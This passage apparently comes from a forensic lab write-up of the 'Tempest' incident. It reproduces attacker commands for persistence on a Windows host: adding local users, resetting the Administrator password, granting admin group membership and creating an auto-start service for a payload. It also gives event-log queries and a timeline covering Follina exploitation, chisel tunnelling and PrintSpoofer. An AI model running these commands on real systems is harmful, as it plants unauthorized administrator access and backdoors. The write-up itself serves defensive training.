SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
They attempted to add two new users, shuna
and shion
, but failed without adding the option, /add
, to the net user
command:
> net user shuna pr1nc3ss!
> net user shion m4st3rch3f!
> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
This time around, with the correct command, the two users were successfully created:
> net user /add shuna princess
The command completed successfully.
> net user /add shion m4st3rch3f!
The command completed successfully.
> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru shion
shuna WDAGUtilityAccount
The command completed with one or more errors.
Another thing the threat actor did for persistence was to change the local administrator's password as well as add the new user, shion
, to the localadministrators
group:
> net user Administrator ch4ng3dpassword!
The command completed successfully.
> net localgroup administrators /add shion
The command completed successfully.
> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.
The logs below confirms the creation of two new users (Event ID 4720) as well the addition of shion
to the localadministrators
group (Event ID 4732):
$ cat windows.json | grep -E 'EventId..4720' | jq -r '{Username: .PayloadData1, Time: .TimeCreated}'
{
"Username": "Target: TEMPEST\\shuna (S-1-5-21-349058839-1848105669-1528301110-1002)",
"Time": "2022-06-20T17:27:19.1269169+00:00"
}
{
"Username": "Target: TEMPEST\\shion (S-1-5-21-349058839-1848105669-1528301110-1003)",
"Time": "2022-06-20T17:27:28.6292691+00:00"
}
$ cat windows.json | grep -E 'EventId..4732' | grep Administrators | jq -r '{Group: .PayloadData1, MemberSID: .PayloadData4, Time: .TimeCreated}'
{
"Group": "Target: Builtin\\Administrators (S-1-5-32-544)",
"MemberSID": "MemberSid: S-1-5-21-349058839-1848105669-1528301110-1003",
"Time": "2022-06-20T17:27:41.2977760+00:00"
}
Another persistence method performed was by creating a service (TempestUpdate2
) that will run final.exe
:
> sc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto
[SC] CreateService FAILED 1073:
The specified service already exists.
> sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto
[SC] CreateService SUCCESS
> sc.exe qc TempestUpdate2
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TempestUpdate2
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\final.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TempestUpdate2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
TIMELINE OF EVENTS
2022-06-20 17:12:56
The file, free_magicules.doc
, was downloaded into the workstation.
2022-06-20 17:13:12
The file, free_magicules.doc
, was opened in Microsoft Word.
2022-06-20 17:13:35
CVE-2022-30190 (Follina) Execution
2022-06-20 17:13:37
The file, update.zip
, was downloaded into the workstation.
2022-06-20 17:15:10
Stage 2 payload (first.exe
) was downloaded into the workstation.
2022-06-20 17:15:14
First seen execution of first.exe
.
2022-06-20 17:18:48
Download and execution of chisel (ch.exe
).
2022-06-20 17:19:05
First seen (assumed) unauthorized login to TEMPEST\benimaru
via WinRM.
2022-06-20 17:20:06
PrintSpoofer exploit (spf.exe
) was downloaded into the workstation.
2022-06-20 17:21:05
The file, final.exe
, was downloaded into the workstation.
2022-06-20 17:21:34
Execution of spf.exe
and final.exe
.
2022-06-20 17:26:29
Creation of the TempestUpdate2
service for persistence.
2022-06-20 17:27:19
Creation of two users (shuna
and shion
) as well as addition of shion
to the local administrators group.
Last updated